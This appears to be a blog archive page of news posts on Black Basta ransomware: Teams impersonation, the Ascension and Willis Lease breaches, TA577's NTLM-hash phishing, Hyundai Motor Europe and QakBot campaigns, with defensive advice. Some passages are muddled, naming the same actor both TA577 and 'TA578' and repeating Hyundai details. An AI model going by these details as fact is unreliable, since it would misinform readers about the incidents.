Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Black Basta Ransomware. Show all posts

Black Basta Targets Microsoft Teams with New Ransomware Tactics

 

The Black Basta ransomware group has resurfaced with a concerning method of spreading file-encrypting malware, now targeting Microsoft Teams. The group, notorious for cyberattacks on technology, finance, and public sector industries, exploits the popular collaboration platform to infiltrate networks.

First observed in October 2024, this new tactic shows a shift from previous approaches. Active since April 2022, Black Basta initially used spam and social engineering to distribute malware. Now, they impersonate IT support staff or colleagues, tricking users into providing credentials for fake network logins, enabling the deployment of malware. This deceptive method replaces older techniques like phone-based social engineering.

Microsoft Teams is a strategic target due to its global use in corporate communication. Many employees trust messages within the platform, often overlooking verification steps. This makes them more vulnerable to attackers who exploit this trust to gain unauthorized access.

In 2023, Black Basta was connected to email phishing campaigns involving links to malicious websites. While those campaigns focused on harvesting credentials and delivering malware, the group's shift to real-time platforms like Teams indicates a significant evolution in their strategy.

Microsoft urges users to exercise caution with suspicious messages, especially those requesting sensitive information or financial transactions. "If a message in Teams appears to ask for credentials or money transfers, users are advised to verify the sender’s identity through other channels," the company recommended. Avoiding unknown links and confirming requests through phone or email are key practices to prevent such attacks.

Ascension Breached Due to Employee Downloading Malicious File

 

Ascension, one of the largest healthcare systems in the United States, disclosed that a ransomware attack in May 2024 was initiated when an employee mistakenly downloaded a malicious file onto a company device.

The healthcare provider indicated that the employee likely believed they were downloading a legitimate file, classifying the incident as an "honest mistake."

The ransomware attack disrupted the MyChart electronic health records system, phone lines, and systems for ordering tests, procedures, and medications. In response, Ascension took some devices offline on May 8 to address what was initially termed a "cyber security event."

As a result, staff had to record procedures and medications manually since electronic patient records were inaccessible. Ascension also temporarily halted some non-urgent elective procedures, tests, and appointments and redirected emergency medical services to other facilities to avoid delays in patient care.

As of Wednesday, Ascension reported that certain services remain affected and that efforts to restore electronic health record systems, patient portals, and phone systems, as well as test, procedure, and medication ordering systems, are ongoing.

An ongoing investigation revealed that the attackers accessed and stole files from only seven of the thousands of servers on Ascension's network.

"Currently, we have evidence showing the attackers accessed files from a limited number of servers used by our staff for daily tasks. These servers account for seven out of approximately 25,000 across our network," an Ascension spokesperson stated. "While the investigation continues, we believe some of the compromised files may contain Protected Health Information (PHI) and Personally Identifiable Information (PII), though the specific data affected varies."

However, Ascension has not found evidence that the attackers accessed data from its Electronic Health Records (EHR) and other clinical systems, which contain comprehensive patient records.

Though Ascension has not officially identified the responsible party, CNN reported that the Black Basta ransomware group is suspected to be behind the attack.

Shortly after the incident, the Health Information Sharing and Analysis Center (Health-ISAC) issued a warning that Black Basta had intensified its attacks on the healthcare sector.

Since its emergence in April 2022, Black Basta has targeted numerous high-profile organizations, including Rheinmetall, Capita, ABB, and the Toronto Public Library. Research by Elliptic and Corvus Insurance indicated that the group had extorted over $100 million from more than 90 victims as of November 2023.

As a major nonprofit health network, Ascension operates 140 hospitals and 40 senior care facilities. In 2023, it reported a total revenue of $28.3 billion. The organization employs 8,500 providers, with 35,000 affiliated providers and 134,000 associates across 19 states and the District of Columbia.

New Email Scam Targets NTLM Hashes in Covert Data Theft Operation

 


TA577 has been identified as a notorious threat actor who orchestrated a sophisticated phishing campaign, according to researchers at security firm Proofpoint. Currently, the group is utilizing a new method of phishing involving ZIP archive attachments. This tactic is geared towards pilfering the hash data of NT LAN Manager (NTLM) users.

According to our investigation, this group is utilizing a chain of attacks aimed at stealing authentication information from the NT LAN Manager (NTLM) system. It would be possible to exploit this method for obtaining sensitive data and facilitating further malicious activity if this method were to be exploited. 

By using booby-trapped email attachments containing booby-trapped NTLM hashes to steal employees' NTLM hashes, a threat actor that is known for establishing initial access to organizations' computer systems and networks is using these attachments to steal employees’ hashes. Earlier this week, enterprise security firm Proofpoint published a report that suggested that the new attack chain "is capable of gathering sensitive information and facilitating follow-on activities." 

As reported by the company, at least two phishing campaigns have utilized this approach since February 26, 2024, when thousands of messages were distributed worldwide and hundreds of organizations were targeted. As an initial access broker (IAB), TA577 has previously been associated with Qbot and has been linked to Black Basta ransomware infections. 

The phishing waves spread thousands of messages around the world and targeted hundreds of organizations. The email security company Proofpoint reported today that although it has seen TA577 favouring Pikabot deployment in recent months, two recent attacks indicate that TA577 has taken a different approach to the attack. 

A group called TA578, which has been linked with the Qbot malware campaign and the Black Basta ransomware campaign, is one of the first access brokers. Recently, it has demonstrated an increasing interest in exploiting authentication protocols despite its previous inclination toward deploying Pikabot malware. 

NTLM hashes are a cornerstone of the security of Windows systems for authentication and session management. Attackers are extremely interested in these hashes as they are potentially useful in offline password cracking and in pass-the-hash attacks, which do not require actual passwords to gain access to services but instead use hashes as shortcuts. 

A technique known as thread hijacking, by which the attackers craft phishing emails that seem like legitimate follow-up emails to ongoing conversations, is used by the attackers. There is a malicious external server that is used to capture NTLM hashes, as these emails contain personalized ZIP files with HTML documents. When opened, these malicious servers start connecting to a malicious external server that has been set up specifically to capture these hashes. 

TA577 likely has the resources, time, and experience to iterate and test new delivery methods at the rate at which it adopts and distributes new tactics, techniques, and procedures (TTPs). TA577, along with other IABs, seems to be on top of the threat landscape and understands when and why certain attack chains cease to be effective. 

To increase the effectiveness and likelihood of victim engagement with their payload delivery and bypass detections, they will be able to create new methods to bypass detections and make use of them as quickly as possible. Researchers at Proofpoint have also noticed an increase in the use of file scheme URIs to direct recipients to external file shares such as SMB and WebDAV for the delivery of malware. To prevent exploits identified in this campaign, organizations should block outbound SMBs to prevent these sophisticated attacks. 

While restricting guest access to SMB servers is a simple security measure, it falls short of preventing these sophisticated attacks. The company advises that strict email filtering be implemented, outbound SMB connections should not be allowed, and Windows group policies should be activated to minimize the risk. 

To combat these types of NTLM-based threats effectively, Microsoft has introduced advanced security features into Windows 11 to help users. It is important to maintain constant vigilance and take strong security measures to prevent phishing attacks targeting the NTLM authentication protocol. For organizations to remain safe from sophisticated cybercriminal endeavours, they must stay abreast of emerging threats and adjust their defences to keep up with the rapidly evolving threats.

Dealers of Jet Engines to Major Airlines Reveals 'Unauthorized Activity'

 

The Willis Lease Finance Corporation has disclosed to US regulators that it was targeted in a "cybersecurity incident," with data allegedly taken from the company being shared on the Black Basta ransomware group's leak blog.

In a filing submitted to the Securities and Exchange Commission (SEC) on February 9, the publicly listed company on NASDAQ stated that it became aware of a potential breach on January 31, prompting immediate action to address the situation.

According to the filing, the company initiated an investigation into the incident with the help of leading cybersecurity experts, taking measures to contain and address the activity, including temporarily shutting down certain systems. The company reported no unauthorized activity after February 2, 2024, and believes it has successfully contained the breach.

During the period when systems were offline, the company acknowledged resorting to alternative methods to maintain operations and serve customers, although specific details were not provided.

Willis Lease Finance also stated it is still evaluating the extent of the breach and whether any data was compromised. Law enforcement has been notified about the breach.

Although the company refrained from explicitly mentioning "ransomware" or "attack" in its disclosure, the presence of passport scans on Black Basta's website suggests that the investigation into potential data theft may yield results soon.

The ransomware group claims to have obtained 910 GB of company data, including information about customers, employees, HR records, non-disclosure agreements (NDAs), among others. Black Basta published a selection of documents online, including screenshots of accessed files, HR documents containing social security numbers, and identity documents such as passports.

Attempts to match names on these documents with online profiles revealed matches predominantly in the US and UK, along with some from other countries.

Efforts to reach Willis Lease Finance for comment were unsuccessful at the time of reporting.

Established for over 45 years, Willis Lease Finance describes itself as a leading independent provider of jet engines to major airlines worldwide.

Black Basta, known for its high-profile ransomware attacks, is linked to the now-defunct Conti group and is believed to have amassed over $100 million from its victims, including major organizations like Capita and Southern Water in the UK.

Hyundai Motor Europe Grapples with Cyber Threat as Black Basta Ransomware Strikes

 


A California union and Hyundai Motor Europe both announced separately this week that they had suffered cyberattacks in the past month, resulting in the loss of their data. According to Black Basta, a group that first emerged in 2022 as a double-extortionist group, Hyundai Motor Europe's data has been stolen more than 3TBs. 

The carmaker has not confirmed that it has been infected by ransomware, nor does Black Basta agree with its claims. An attack on the Hyundai Motor Europe division of the South Korean company earlier this year has been confirmed by the division's CEO. 

Hyundai Motor Europe was initially reported to have suffered a cyber-attack in the middle of January, however, Hyundai immediately shot the report down, saying it was simply a matter of IT issues. According to BleepingComputer, who first reported the story on Thursday, the South Korean automaker announced in early January that it was having "IT problems" that it was “working to resolve as soon as possible.” 

This news has been spreading fast since then. In the past week, the media outlet has been informed that Black Basta is connected with the incident and the alleged theft of 3TB of data. Cybernews is unaware of any mention of Hyundai or the stolen data on Black Basta's dark leak website at the moment of publishing, but it is very common for extortion groups to wait until ransom negotiations have firmly broken down to post about their victims. 

A further statement from Hyundai has not yet been released about which systems were compromised in the attack, how much sensitive data may have been accessed, and what was the extent of the damage. According to the Black Basta ransomware gang, Hyundai Motor Europe has been hacked and three terabytes of their data were stolen by the gang. 

There is evidence of a data breach from the threat actors, which was revealed. The gang seems to have stolen data from several departments, including legal, sales, and human resources, among others. In addition to having access to email addresses, physical addresses, phone numbers, and vehicle chassis numbers of affected individuals, threat actors were also able to obtain the information that they needed. 

An unauthorized third party has accessed the customer database of Hyundai Italy, as stated in the data breach letter sent to impacted individuals. To determine the scope of the incident, Hyundai Italy has notified the privacy watchdog and hired cybersecurity experts.

In the evidence provided to Bleeping Computer, the crooks revealed that there was a data breach that occurred in multiple departments of the business, such as legal, sales, and human resources. It was announced in April that Hyundai had suffered yet another data breach which affected Italian and French car owners as well as customers who had booked a test drive with them. 

Among the impacted individuals were people with emails, physical addresses, telephone numbers, and vehicle chassis numbers, which could be used to identify threat actors. An unauthorized third party had access to the database of customers according to a letter sent to the impacted individuals advising them of a data breach.

This incident has been reported to the privacy watchdog in Italy and Hyundai has hired a cybersecurity expert from an external company to determine the extent of the issues. A letter sent by the bank indicated that no financial information had been disclosed. 

The German media reported in December 2019 that suspected members of the Vietnam-linked APT Ocean Lotus (APT32) group had breached the networks of the automakers BMW and Hyundai as part of the hacking campaign. An intrusion was carried out to steal automotive trade secrets from the company.

Active Threat of Black Basta Ransomware on US Companies by QakBot Malware

 


Recently Joakim Kandefelt and Danielle Frankel, researchers at Cybereason, a cybersecurity organization, announced that the Black Basta ransomware is operating a new campaign targeting U.S. companies with QakBoat malware. The malicious actors are trying to enter and later capture the organization’s network through this campaign. 

The threat actors use dangerous ransomware known as Black Basta Ransomware as a tool to capture the data of the victim’s network or system. This ransomware is specially targeted at organizations instead of individuals. Black Basta Ransomware captures and locks the data of the targeted organization by using encryptions that cannot be cracked without the specific decryption keys. 

Black Basta ransomware was first observed in April and was considered to be an outgrowth of the Conti ransomware. It uses the tested method of double extortion to extract confidential information from the targeted organization. After collecting this data, the cyber attackers use it to coerce the victim to get a ransom in exchange for the data. The attackers threaten the victim to release the information to the public in case the victim fails to pay demanded ransom. 

It is worth noting that Black Basta Ransomware attacks on a network make changes to the victim's desktop. These changes include renaming the original file name with the ‘.basta’ file extension, changing the desktop background with a new image, and creating a new file on the system as “readme.txt.” The wallpaper image includes a short message which directs the targeted users to open that text file. 

The prime target companies of the ransomware are from the U.S., Canada, Australia, and New Zealand. 

The QakBot, used in the latest campaign by Black Basta ransomware, dated back to 2019 and was highly used in many other ransomware attacks, like Fujifilm Holding Corp in 2020. The prominent factor of QakBot that made it the most used malware by attackers is that once the QakBot gets access to the target’s network, it also creates an entrance for the threat actor to deploy more malware. 

In a study of the campaign by Black Basta ransomware, it was observed that the minds behind this campaign are highly advanced and working sophisticatedly. In an attack under this campaign, the malicious actors get access to the domain of the victim’s network within 2 hours, and they can deliver the ransomware in just twelve hours. 

The Cybereason sent out a warning to organizations to be aware of and safeguard them from these attacks. There are certain precautionary measures that need to be followed. Firstly, the companies should be aware and avert infections from Black Basta and QakBot, and secondly, Cybereason customers should permit variant payload protection and obstruct vulnerable users and sources. 

Additionally, every organization should spot network connections that seem malicious. Resetting Active Directory access is also advised by Cybereason.